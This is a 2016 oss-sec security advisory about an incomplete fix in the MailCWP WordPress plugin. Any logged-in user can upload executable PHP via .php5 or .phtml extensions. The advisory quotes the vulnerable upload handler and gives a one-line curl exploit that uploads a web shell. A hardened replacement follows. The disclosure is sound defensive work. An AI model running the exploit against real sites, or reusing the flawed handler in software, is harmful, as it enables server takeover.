oss-sec mailing list archives
Mailcwp remote file upload vulnerability incomplete fix v1.100
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 08 Nov 2016 05:40:55 -0500
Title: Mailcwp remote file upload vulnerability incomplete fix v1.100
Author: Larry W. Cashdollar, @_larry0
Date: 2016-11-01
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2016-11-01
Vendor Contact: plugins () wordpress org

Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.

Vulnerability: I noticed CVE-2015-1000000 wasn't fixed correctly: _any_ authenticated user can upload a file to the WordPress installation, and they can get .php code execution by changing the extension to .php[3-5], .pht or .phtml.

My previous advisory: http://www.vapidlabs.com/advisory.php?v=138

    <?php
    require_once "../../../wp-load.php";

    // Only a login is required; no capability or nonce check.
    if (!is_user_logged_in()) {
        die('{"ERROR": -1}');
    }

    // Both values come straight from the request, including the destination directory.
    $message_id = $_REQUEST["message_id"];
    $upload_dir = $_REQUEST["upload_dir"];

    if (empty($_FILES) || $_FILES["file"]["error"]) {
        die('{"OK": 0}');
    }

    $fileName = $_FILES["file"]["name"];
    $ext = pathinfo($fileName, PATHINFO_EXTENSION);

    // Denylist of a single extension: php3, php4, php5, pht and phtml pass through.
    if ($ext == 'php') {
        die('{"ERROR": -2}');
    }

    // File is stored under the caller-chosen directory with the caller-chosen name.
    move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");
    die('{"OK": 1}');

CVE-2016-1000156

Exploit Code:
Create any type of user and copy the contents of your cookie file for curl:

$ curl -F "file=@/home/larry/shell.php5" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt
{"OK": 1}

Advisory: www.vapidlabs.com/advisory.php?v=175

Notes: Incomplete fix for CVE-2015-1000000
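For comparison, the following is an added example of how the handler above could be hardened; it is not MailCWP's code or a vendor patch. It assumes the same wp-load.php bootstrap and a hypothetical nonce action name 'mailcwp_upload' that the client would obtain via wp_create_nonce().

```php
<?php
// Added example, not the plugin's code: hardened replacement for mailcwp-upload.php.
// Assumes the client sends a nonce created with wp_create_nonce('mailcwp_upload')
// in the 'nonce' parameter (hypothetical action name).
require_once "../../../wp-load.php";
header('Content-Type: application/json');

// A login alone is not enough: require the upload capability and a CSRF nonce.
if (!is_user_logged_in() || !current_user_can('upload_files')) {
    die('{"ERROR": -1}');
}
check_ajax_referer('mailcwp_upload', 'nonce');   // dies on a missing or stale nonce

if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    die('{"OK": 0}');
}

// Allowlist of extensions instead of a denylist of the single string "php".
$allowed  = array('jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt');
$fileName = sanitize_file_name(basename($_FILES['file']['name']));
$ext      = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
if (!in_array($ext, $allowed, true)) {
    die('{"ERROR": -2}');
}

// Cross-check the claimed extension against what WordPress detects from the content.
$check = wp_check_filetype_and_ext($_FILES['file']['tmp_name'], $fileName);
if ($check['ext'] !== $ext) {
    die('{"ERROR": -3}');
}

// The destination directory is chosen by the server, never read from the request.
$uploads = wp_upload_dir();
$dir     = trailingslashit($uploads['basedir']) . 'mailcwp';
wp_mkdir_p($dir);

// The stored name is server-generated, so the uploader controls neither path nor name.
$message_id = absint($_REQUEST['message_id']);
$target     = $dir . '/' . $message_id . '-' . wp_generate_password(12, false) . '.' . $ext;

if (!move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
    die('{"OK": 0}');
}
die('{"OK": 1}');
```

As defence in depth, the web server should also be configured not to execute scripts from the uploads directory, so that a bypass of any one check does not yield code execution.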